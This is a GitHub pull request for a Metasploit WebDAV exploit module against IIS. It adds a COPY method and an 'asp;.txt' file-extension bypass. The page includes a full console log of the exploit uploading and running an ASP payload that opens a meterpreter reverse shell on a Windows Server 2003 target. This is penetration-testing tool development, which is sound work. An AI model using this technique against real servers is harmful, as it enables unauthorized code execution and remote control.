Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

iis_webdav_upload_asp: Add COPY and a few other tricks #6400

Merged
merged 2 commits into from
Jan 14, 2016
Merged

iis_webdav_upload_asp: Add COPY and a few other tricks #6400

merged 2 commits into from
Jan 14, 2016

Conversation

g0tmi1k
Copy link
Contributor

@g0tmi1k g0tmi1k commented Dec 26, 2015

  • Now supports COPY (some times MOVE is limited/disabled)
  • Safety net if forgot leading slash for PATH
  • Able todo filename.asp;.txt for the PATH now (as well as hint to do it, if the session fails)
    • Able to use it o bypass file extension restrictions in older IIS! =)
  • Checks to see if PATH is already on the target before uploading the TEMP file & stops if there is (I cannot overwrite)

Target

meterpreter > sysinfo
Computer        : <REMOVED>
OS              : Windows .NET Server (Build 3790, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/win32
meterpreter >
meterpreter >
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3004 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>

msf exploit(iis_webdav_upload_asp) > show options 

Module options (exploit/windows/iis/iis_webdav_upload_asp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   METHOD    copy             yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
   PASSWORD                   no        The HTTP password to specify for authentication
   PATH      zzz.asp          yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     <REMOVED>        yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <REMOVED>        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run

[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /zzz.asp
[*] Uploading 611022 bytes to /zzz.txt...
[*] Copying /zzz.txt to /zzz.asp...
[!] Copy may have failed. [207 Response]
[!] Try using 'set METHOD move' instead
[*] Executing /zzz.asp...
[-] Execution failed on /zzz.asp [404 Not Found]
[-] The COPY action failed. Possibly IIS doesn't allow 'Script Resource Access'.
[!] Try using 'set METHOD move' instead
[!] Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead
[*] Exploit completed, but no session was created.
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > set PATH /metasploit%RAND%.asp;.txt
PATH => /metasploit%RAND%.asp;.txt
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run


[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /metasploit140597426.asp;.txt
[*] Uploading 614030 bytes to /metasploit140597426.txt...
[*] Copying /metasploit140597426.txt to /metasploit140597426.asp;.txt...
[*] Executing /metasploit140597426.asp;.txt...
[*] Sending stage (957487 bytes) to <REMOVED>
[*] Deleting /metasploit140597426.asp;.txt (this doesn't always work)...
[!] Deletion failed on /metasploit140597426.asp;.txt [403 Forbidden]
[*] Meterpreter session 6 opened (<REMOVED>:4444 -> <REMOVED>:1066) at 2015-12-26 16:06:32 +0000

meterpreter >

@wvu wvu self-assigned this Dec 28, 2015
wvu
wvu reviewed Dec 28, 2015
View reviewed changes
modules/exploits/windows/iis/iis_webdav_upload_asp.rb
print_error("Deletion failed on #{path} [No Response]")
return
end

if (res.code < 200 or res.code >= 300)
# Changed this to a warning, because red is scary and if this aprt fails,
# Changed this to a warning, because red is scary and if this part fails,
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I prefer the original.

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Dec 31, 2015

Fixed up =)

@wvu wvu merged commit d7061e8 into rapid7:master Jan 14, 2016
wvu added a commit that referenced this pull request Jan 14, 2016
@wvu
Land #6400, iis_webdav_upload_asp improvements
7e1446d
@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Jan 14, 2016

Thanks boss! =)

@g0tmi1k g0tmi1k deleted the webdav branch January 14, 2016 20:08
@wvu
Copy link
Contributor

wvu commented Jan 14, 2016

:)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@g0tmi1k @wvu